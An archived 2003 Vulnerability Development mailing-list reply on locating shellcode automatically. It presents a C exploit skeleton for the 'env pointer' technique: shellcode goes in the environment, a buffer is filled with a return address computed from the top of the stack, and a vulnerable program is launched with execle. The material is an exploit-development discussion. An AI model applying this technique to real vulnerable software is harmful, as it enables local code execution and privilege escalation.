Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Automatic discovery of shellcode address

From: Marco Ivaldi <raptor () 0xdeadbeef info>
Date: Tue, 25 Mar 2003 01:38:50 +0100 (CET)
On Mon, 24 Mar 2003 steve () uk intasys com wrote:


  That wasn't the part that I was considering as being novel.

  When I've coded things before I've spent most of my time determinig
 where the return address lies within the area I've overflowed.  (By
 doing a binary search of my 'XXXXXX's).

  I was thinking that by knowing the address of the buffer in the
 processes memory space this would reduce the number of trials down
 to four.  (To deal with alignment issues).


If you are exploiting a local vulnerability you can also use the even
simpler env pointer technique to locate the shellcode.

int main()
{
        char *env[2] = {sc, NULL};
        char buf[BUF];
        int i;

        int *ap = (int *)(buf + ALIGN);
        int ret = 0xbffffffa - strlen(sc) - strlen("./vuln-program");

        for (i = 0; i < BUF - 1; i += 4)
                *ap++ = ret;
        *ap = 0x0;

        execle("./vuln-program", "vuln-program", buf, NULL, env);
}

As you can see, for ./vuln-program shellcode will always be at:

0xbffffffa - strlen(sc) - strlen("./vuln-program")

Cheers,

:raptor
Antifork Research, Inc.                 0xdeadbeef | raptor's labs
http://www.antifork.org                 http://www.0xdeadbeef.info
Previous By Date Next
Previous By Thread Next

Current thread: